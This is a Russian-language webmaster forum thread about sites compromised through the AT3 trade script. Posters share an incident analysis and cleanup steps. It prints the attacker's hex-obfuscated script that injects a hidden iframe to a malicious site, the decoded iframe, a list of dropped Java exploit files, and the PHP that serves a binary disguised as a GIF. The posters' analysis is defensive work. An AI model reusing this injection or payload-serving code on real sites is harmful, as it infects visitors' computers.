Реклама на сайте Advertise with us

Похоже, что 16-й билд ат3 такой же дырявый... :(

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:



С нами с 13.01.03
Сообщения: 1032
Рейтинг: 1146

Ссылка на сообщениеДобавлено: 03/01/08 в 13:44       Ответить с цитатойцитата 

В общем ситуация такая же, как и в прошлые разы... backup.php появляется, меняется темплейт и несколько пхп файлов - вставляется кодированный ифрейм... на всех сиджах на серваке стоял 16-й билд под федору 5... фтп тока на мой айпи настроен, так что этот вариант исключается, ssh - тоже... x2.cgi не был заблочен, 12 обращений к нему в логах с айпи 195.5.116.250... сейчас x2.cgi заблочил, поглядим что будет...

ну и самое интересное... код ифрейма:

Код:
<script> var s='3C696672616D65207372633D22687474703A2F2F616D61746575727570736B697274732E696E666F2F73722F7A2F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37);  o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>


после перекодировки получаем:

Код:
<iframe src="http://amateurupskirts.info/sr/z/static.php" width=2 height=2 style="display:none"></iframe>


сидж товарисча pns, который вот тут утверждает, что инфо домены лучче всех - Как народ относится к зоне .info?

по приведенному топику очень похоже на подставу, но чем черт не шутит... icon_smile.gif... в общем очень бы хотелось услышать каментов от товарисча pns

0
 



С нами с 21.09.04
Сообщения: 609
Рейтинг: 473

Ссылка на сообщениеДобавлено: 03/01/08 в 14:16       Ответить с цитатойцитата 

срочно разбираюсь..

....

первые итоги.

Этот "вирус" создаёт каталог с именем "z" в дире sr
и файлы backup.php backups.php в корне каталога sr .

Внутри z лежит следующее:
Код:
-rw-r--r-- 1   1879 May 11  2006 Installer.class
-rw-r--r-- 1  25681 May 11  2006 MagicApplet.class
-rw-r--r-- 1   8298 Oct 31 09:27 OP.jar
-rw-r--r-- 1    994 May 11  2006 OwnClassLoader.class
-rw-r--r-- 1    352 May 11  2006 ProxyClassLoader.class
-rw-r--r-- 1  31142 Jan  3 11:19 __ex.log
-rw-r--r-- 1  92202 Jan  3 11:19 __in.log
-rw-r--r-- 1    827 Oct 31 09:27 animan.class
drwxr-xr-x 3   4096 Nov 17 08:06 com
-rw-r--r-- 1  34049 Dec 29 10:59 ex.html
-rw-r--r-- 1    321 Dec 29 23:15 ex.php
-rw-r--r-- 1  14688 Oct 31 09:27 ms03011.jar
-rw-r--r-- 1   2407 Oct 31 09:27 omfg.class
-rw-r--r-- 1  38903 Jan  2 15:01 static.php


Полный код ex.php
Код:

$size = filesize('ex.html');

header("Content-Length: $size");
header("Content-Type: image/gif");


$fp=fopen('ex.html','rb');
$var = fread($fp,filesize('ex.html'));
echo $var;
fclose($fp);

mylog('__ex.log','*');

exit;

function mylog($fname,$text)
{
$fp=fopen($fname,"a");
fwrite($fp,$text);
fclose($fp);
}


?>


В ex.html лежит бинарник под MSDOS -- это файл, видно, и выкачивают на комп юзера с зараженной веб-страницы.

Последний раз редактировалось: pns (03/01/08 в 14:32), всего редактировалось 1 раз

0
 



С нами с 13.01.03
Сообщения: 1032
Рейтинг: 1146

Ссылка на сообщениеДобавлено: 03/01/08 в 14:23       Ответить с цитатойцитата 

не поленитесь, отпишите владельцу хоста, с айпи которого всех поломали - http://esthost.eu/rus/contact/

пысы: к scr хост не имеет отношения... icon_smile.gif

0
 



С нами с 13.01.03
Сообщения: 1032
Рейтинг: 1146

Ссылка на сообщениеДобавлено: 03/01/08 в 14:27       Ответить с цитатойцитата 

pns писал:
срочно разбираюсь..


ищи в логах домена обращения к x2.cgi

0
 



С нами с 13.01.03
Сообщения: 1032
Рейтинг: 1146

Ссылка на сообщениеДобавлено: 03/01/08 в 14:36       Ответить с цитатойцитата 

ну и кого ломали раньше, не поленитесь сделайте комманды

locate backup.php
locate static.php

потому как походу наличие файла backup.php позволяет ломать даже с заблоченым х2... да и кладет его пидарасина теперь не в корень...

0
 



С нами с 21.09.04
Сообщения: 609
Рейтинг: 473

Ссылка на сообщениеДобавлено: 03/01/08 в 14:51       Ответить с цитатойцитата 

вот оно где зарыто!

конечно: в корне все backup.php поудалял, а в бэкапах streamrotator они остались, да ещё в -цати экземплярах по числу бэкапов.

locate ничего не нашёл, зато поиск в mc выискал всех уродов.

StreamRotator в аминке в меню backup указывает на неверные бэкапы, как "corrupted".

Удобнее всего пройтись по админкам всех стримов и вручную удались все бэкапы за предыдущие периоды.
Потом убедиться в том, что *сейчас* в каталоге sr/ ничего чужеродного нет, и создать бэкап вручную.

0
 



С нами с 06.11.06
Сообщения: 544
Рейтинг: 166

Ссылка на сообщениеДобавлено: 03/01/08 в 15:08       Ответить с цитатойцитата 

Оффтоп: Гмм... господа at3 гавно скрипт, помоему это давно очевидно.

In the end, It doesn't even matter.

0
 

Хостинг, CDN

С нами с 23.12.04
Сообщения: 1259
Рейтинг: 1405

Ссылка на сообщениеДобавлено: 03/01/08 в 15:09       Ответить с цитатойцитата 

А не http://web.compic.ee/ru/ принадлежит 195.5.116.250 айпи?
Давайте не поленимся абузу накатаем, я это уже сделал..

0
 



С нами с 11.06.03
Сообщения: 1266
Рейтинг: 950


Передовик Master-X (01.01.2008)
Ссылка на сообщениеДобавлено: 03/01/08 в 15:21       Ответить с цитатойцитата 

MaxLester писал:
Оффтоп: Гмм... господа at3 гавно скрипт, помоему это давно очевидно.

Проблема в том, что это далеко не оффтоп.

0
 



С нами с 21.09.04
Сообщения: 609
Рейтинг: 473

Ссылка на сообщениеДобавлено: 03/01/08 в 19:04       Ответить с цитатойцитата 

вот тебе оффтоп: microsoft windows дыряв сколько уже десятков лет, как минное поле в войну, но юзали, юзают и будут юзать и дальше.

уже сколько раз сказано: массово популярный софт в первую очередь подвежен хакингу.


вопрос не в конкретных дырах софта, а в тенденции.
Представим, что лёгкие дыры в ATL3/ATX закрыли. Куда хакеры двинуться? В сторону тех скриптов, которые сейчас на фоне AT выглядят "надёжными". И превратятся тогда "надёжные" в "гов#$%енные".

0
 

пьяный мастер

С нами с 06.09.05
Сообщения: 11947
Рейтинг: 5837


Передовик Master-X (16.12.2006) Передовик Master-X (01.01.2007) Передовик Master-X (16.01.2007) Передовик Master-X (16.09.2020)
Ссылка на сообщениеДобавлено: 03/01/08 в 19:21       Ответить с цитатойцитата 

Цитата:
Тема: Похоже, что 16-й билд ат3 такой же дырявый... :(


я как юзал билд 10 (на многих сайтах) так и юзаю...... и похуй мне на всех хакеров... сломать могут любого лишбы желание было :)

0
 



С нами с 11.06.03
Сообщения: 1266
Рейтинг: 950


Передовик Master-X (01.01.2008)
Ссылка на сообщениеДобавлено: 03/01/08 в 21:50       Ответить с цитатойцитата 

pns писал:
вот тебе оффтоп: microsoft windows дыряв сколько уже десятков лет, как минное поле в войну, но юзали, юзают и будут юзать и дальше.
уже сколько раз сказано: массово популярный софт в первую очередь подвежен хакингу.

Кто сказал, что бесполезно биться головой об стену ?
Софт надо писать качественный. Тот кто считает, что это невозможно - просто не умеет этого делать.
Я бы вообще не преследовал хакеров. Если Ваш софт падает от "наездов" - виноват программер, а не кто-то ещё. Вся борьба с хакерами адвертится и финансируется бездарями вроде микрософта, которые продают некачественный софт и пытаются переложить ответственность на кого-то.

0
 



С нами с 02.09.07
Сообщения: 96
Рейтинг: 115

Ссылка на сообщениеДобавлено: 04/01/08 в 01:29       Ответить с цитатойцитата 

У меня тоже с 16 проблема. Прочитал тему и полез смотреть, вижу в sr папке backup.php который сканит все файлы, но на этом вроде все.

Взлом сегодня, судя по дате. Логов нет...

Блять, опять закрывать форму?

0
 



С нами с 11.06.03
Сообщения: 1266
Рейтинг: 950


Передовик Master-X (01.01.2008)
Ссылка на сообщениеДобавлено: 04/01/08 в 01:34       Ответить с цитатойцитата 

Кстати, если дело только в скрипте сабмита, то мож его просто переделать самим ? формат базы трейдеров известен ?

0
 



С нами с 02.09.07
Сообщения: 96
Рейтинг: 115

Ссылка на сообщениеДобавлено: 04/01/08 в 01:43       Ответить с цитатойцитата 

Да, формат известен, все открыто. Надо посмотреть, реально ли это

0
 



С нами с 02.09.07
Сообщения: 96
Рейтинг: 115

Ссылка на сообщениеДобавлено: 04/01/08 в 01:52       Ответить с цитатойцитата 

У меня ссылка в iframe на такойже static.php только лежит он на 15den.com

0
 



С нами с 22.01.04
Сообщения: 1037
Рейтинг: 694

Ссылка на сообщениеДобавлено: 04/01/08 в 02:06       Ответить с цитатойцитата 

У меня осталось три копии ат3 и одна атх. Ничего не сломали слава яйцам. Хотя там htaccess были. Завтра встану и все переведу на другие скрипты. Как бы не хвалили его почитатели и не защищали, но настоебенило уже.

0
 



С нами с 05.02.07
Сообщения: 286
Рейтинг: 222

Ссылка на сообщениеДобавлено: 04/01/08 в 03:10       Ответить с цитатойцитата 

Такое чуство что все превратились в амеров и читают в однозадачном режиме только последний пост. Глухой телефон блин.

Для истериков:

pns писал:
вот оно где зарыто!

конечно: в корне все backup.php поудалял, а в бэкапах streamrotator они остались, да ещё в -цати экземплярах по числу бэкапов.

locate ничего не нашёл, зато поиск в mc выискал всех уродов.

StreamRotator в аминке в меню backup указывает на неверные бэкапы, как "corrupted".

Удобнее всего пройтись по админкам всех стримов и вручную удались все бэкапы за предыдущие периоды.
Потом убедиться в том, что *сейчас* в каталоге sr/ ничего чужеродного нет, и создать бэкап вручную.


pns сам оставил дыру еще с прошлого раза.

0
 



С нами с 04.08.03
Сообщения: 343
Рейтинг: 127

Ссылка на сообщениеДобавлено: 04/01/08 в 03:28       Ответить с цитатойцитата 

Sha писал:
Софт надо писать качественный. Тот кто считает, что это невозможно - просто не умеет этого делать.


Ты бредишь - ломается все, а то что особенно актуально ломается очень, очень быстро. Разуй глаза.

0
 



С нами с 02.09.07
Сообщения: 96
Рейтинг: 115

Ссылка на сообщениеДобавлено: 04/01/08 в 03:32       Ответить с цитатойцитата 

doomed писал:
Такое чуство что все превратились в амеров и читают в однозадачном режиме только последний пост. Глухой телефон блин.

pns сам оставил дыру еще с прошлого раза.


Тоесть, меня, тупого амера, сломали из-за того что pns оставил у себя в бэкапах эксп? ;)

0
 



С нами с 05.02.07
Сообщения: 286
Рейтинг: 222

Ссылка на сообщениеДобавлено: 04/01/08 в 04:01       Ответить с цитатойцитата 

sir.korvin писал:
Тоесть, меня, тупого амера, сломали из-за того что pns оставил у себя в бэкапах эксп? ;)

Сдесь где-то есть упоминание тебя?
А уж почему тебя сломали - это к телепатам, от тебя никакой информации "почему, как и когда" пока не вижу (как и от Doctor впрочем, кроме той, что его опять сломали).

0
 

саблезубый кролик

С нами с 02.07.05
Сообщения: 2966
Рейтинг: 993

Ссылка на сообщениеДобавлено: 04/01/08 в 04:30       Ответить с цитатойцитата 

Twich писал:
Ты бредишь - ломается все, а то что особенно актуально ломается очень, очень быстро. Разуй глаза.

И нормальную валидацию форм сделать тяжело уже после первого взлома? То что там с тире так это вообще маразм.

.

0
 



С нами с 28.01.06
Сообщения: 380
Рейтинг: 588

Ссылка на сообщениеДобавлено: 04/01/08 в 10:18       Ответить с цитатойцитата 

А никто не заметил что у всех кого поламали стоит стрим ротатор? icon_smile.gif
Так что может не туда капаем а?

Buy ADS
More trades, Hosting Service

0
 

Любитель хорошего ;)

С нами с 08.06.07
Сообщения: 16151
Рейтинг: 6269


Передовик Master-X (01.06.2009) Передовик Master-X (01.10.2009) Передовик Master-X (16.10.2009) Передовик Master-X (01.12.2009) Передовик Master-X (01.11.2010) Ветеран трепа Master-X (16.02.2011)
Ссылка на сообщениеДобавлено: 04/01/08 в 10:55       Ответить с цитатойцитата 

Но запросы шли на файлы at3 а не стрима.

Отличные серверы от SGManaged!

0
 



С нами с 15.08.07
Сообщения: 203
Рейтинг: 321

Ссылка на сообщениеДобавлено: 04/01/08 в 10:59       Ответить с цитатойцитата 

а чего стоит, заменить фаил at (через стрим) и потом его запрашивать, что бы было без палева?

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »